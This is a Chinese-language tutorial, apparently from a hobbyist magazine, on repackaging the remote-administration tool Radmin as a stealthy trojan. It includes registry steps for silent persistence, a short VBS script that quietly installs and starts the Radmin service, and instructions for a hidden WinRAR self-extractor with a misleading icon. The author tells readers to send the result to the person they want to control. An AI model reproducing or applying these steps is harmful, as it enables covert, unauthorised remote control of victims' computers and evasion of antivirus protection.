作者:一白
对于喜欢玩远程控制的菜鸟来说,寻找一款不被查杀的木马至关重要,
打造一款完美的木马
。可惜的是,现在绝大多数公开发行的木马都会被查杀,虽然可以通过修改特征码甚至反汇编来躲避杀毒软件,但这些技术对于我等菜鸟有些难度,有没有一款不被查杀的“木马”呢?答案当然是肯定的,它就是radmin。radmin其实不是一款真正的木马,只是一款商业远程控制软件,所以到现在为止还没被列入木马行列。它不仅是网管的得力助手,而且是我等菜鸟的最爱,本文来教你如何把它打造成一款完美木马。Flow me!远程控制,指的是在本地计算机上通过远程控制软件发送指令给远程的计算机,从而操纵远程计算机使之能够完成一系列工作。远程控制在众多的领域里有着非常广泛的应用,如远程培训与教学、远程办公、对计算机及网络的远程管理与维护、远程监控。本文以radmin(影子汉化版)为例介绍远程控制玩法。
Remote Administrator (Radmin)是最快的远程控制软件,又因为它不被杀毒软件查杀,从而成为远控爱好者的首选。
一、radmin的配置
首先下载并解压Radmin。解压后有七个文件,打开“配置r_server”文件;
点选“注册信息”,把sn文件中的注册码复制粘贴到对话框中确定;
点击“设置密码”按钮进入设置密码窗口,为rad?鄄min设置不少于8位的密码后确定;
点选“设置参数”按钮进入设置参数窗口,选中“隐藏状态栏图标”前的复选框,端口可以改也可以默认,然后确定。
最后点“安装服务”,确定后退出。好,radmin的配置完毕。
二、导出注册表信息
因为Radmin工作原理的特殊性,配置信息并非记录在服务端程序内,而是在相关的注册表键值内,所以我们要导出注册表中的radmin信息。
打开注册表编辑器(开始->运行->输入regedit后回车),依次展开“HKEY_LOCAL_MACHINE\SYSTEM\
Radmin”键值项,在“radmin”键值项上右击选择“导出”,保存为名为r_server.reg的文件。
再依次展开“HKEY_LOCAL_MACHINE\SOFTWAR
E\Microsoft\Windows\CurrentVersion\Run”,在右边的窗口空白处右键单击,依次选择“新建”、“字符串值”,为新建的字符串起个名字,比如radmin,再在其上双击,在弹出的对话框的“数值数据”处填入“C:\WINDOWS\sys?鄄tem32\r_server.exe”(不包括引号)后确定,然后导出radmin项,名称为qidong.reg ,
电脑资料
《打造一款完美的木马》(https://www.unjs.com)。到此radmin的前期准备工作就做好了,下面来把它打造成完美木马。
三、打造完美木马
打开记事本,输入以下代码:
set ws=wscript.createobject(“wscript.shell”)
ws.run “regedit.exe /s r_server.reg”,0
ws.run “regedit.exe /s qidong.reg”,0
ws.run “r_server.exe /install /silence”,0
ws.run “r_server.exe /start”,0
另存为yunxing.vbs。
把radmin32文件夹中的r_server.exe、AdmDll.dll、raddrv.dll三个文件以及r_server.reg、qidong.reg和刚才的yunxing.vbs共六个文件复制到同一目录下,然后同时选中它们,用鼠标选中这六个文件,单击鼠标右键,选择“添加到压缩文件”(前提是你安装了WINRAR)。
在弹出的对话框的“常规”选项卡的“存档选项”框中选中“创建自释放格式档案文件(X)”前的复选框,然后切换到“高级”选项卡,点选“SFX选项(X)”进入高级自释放选项设置:在这里的“常规”选项卡中的释放路径一栏处填入“C:\WINDOWS\system32”(不包括引号),在“释放后运行”里填入yunxing.vbs(注意填写文件扩展名)。再切换到“模式”选项卡,缄默模式设置成“全部隐藏”,覆盖方式设置成“覆盖所有文件”。切换到“文字和图标”选项卡,在“自定义SFX”框中点“浏览”选择一个迷惑性的图标。最后连续点击两次“确定”完成收尾工作。好,完美的木马已经打造完成,把这个木马传给你要控制的人,你就可以玩远程控制了。
四、radmin的使用
这里简单的说一下radmin的使用方法:打开rad?鄄min.exe, 选择“连接选项”->“连接到……”,在“连接类型”中选择你想要的功能,在“所连接的IP地址或DNS”中输入服务端的IP地址,然后点击“确定”,在弹出的对话框中输入你原先设置的密码,确定后就连接成功了。
好了,本文就到这里,有不懂的地方请到杂志论坛交流。祝你玩的愉快!